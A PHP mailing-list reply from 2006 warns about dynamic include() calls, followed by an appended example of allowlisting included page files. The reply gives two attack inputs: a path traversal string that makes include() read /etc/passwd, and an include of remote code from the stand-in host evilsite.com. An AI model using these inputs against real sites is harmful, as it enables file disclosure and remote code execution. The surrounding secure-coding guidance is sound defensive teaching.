On Tuesday 13 June 2006 21:17, Dave M G wrote:
> If there is some other way for them to exploit a dynamic include()
> function, then please let me know.

$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);

Or in later versions of PHP, I *think* the following may even work:

$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);

Now, having a variable inside an include() is not automatically bad. It can be a good way to make code cleaner and allow you to conditionally include certain libraries only when you need them. Just be very very careful about where those variables come from.

-- 
Larry Garfield
AIM: LOLG42
larry@xxxxxxxxxxxxxxxx
ICQ: 6817012

"If nature has made any one thing less susceptible than all others of exclusive property, it is the action of the thinking power called an idea, which an individual may exclusively possess as long as he keeps it to himself; but the moment it is divulged, it forces itself into the possession of every one, and the receiver cannot dispossess himself of it." -- Thomas Jefferson

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
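The safe way to do the dynamic include Larry describes is to never let the request value reach include() directly: map it through an allowlist and confirm the resolved path stays inside the intended directory. This is an added example, not code from the thread; the `pages/` directory, the page names and the `page` query parameter are assumptions for illustration.

```php
<?php
// Added example: dispatch a request to one of a fixed set of page files.
// PAGE_DIR and the allowlist entries are assumed values for this demo.
const PAGE_DIR = __DIR__ . '/pages';

// Only these request values are accepted, and each maps to a concrete file.
// Traversal strings ('../../etc/passwd') and URLs ('http://...') never match
// a key, so include() is never called with them.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path for an allowed page name, or null if the name is
 * not on the allowlist or the file does not resolve to a location under
 * PAGE_DIR (for example through a symlink).
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);

    // realpath() returns false for missing files and follows symlinks, so
    // re-check that the final path still sits beneath the base directory.
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$file = resolvePage($page);

if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}

include $file;
```

As defence in depth against the remote-URL case, keep `allow_url_include=Off` in php.ini so include() refuses `http://` paths regardless of what the application passes it.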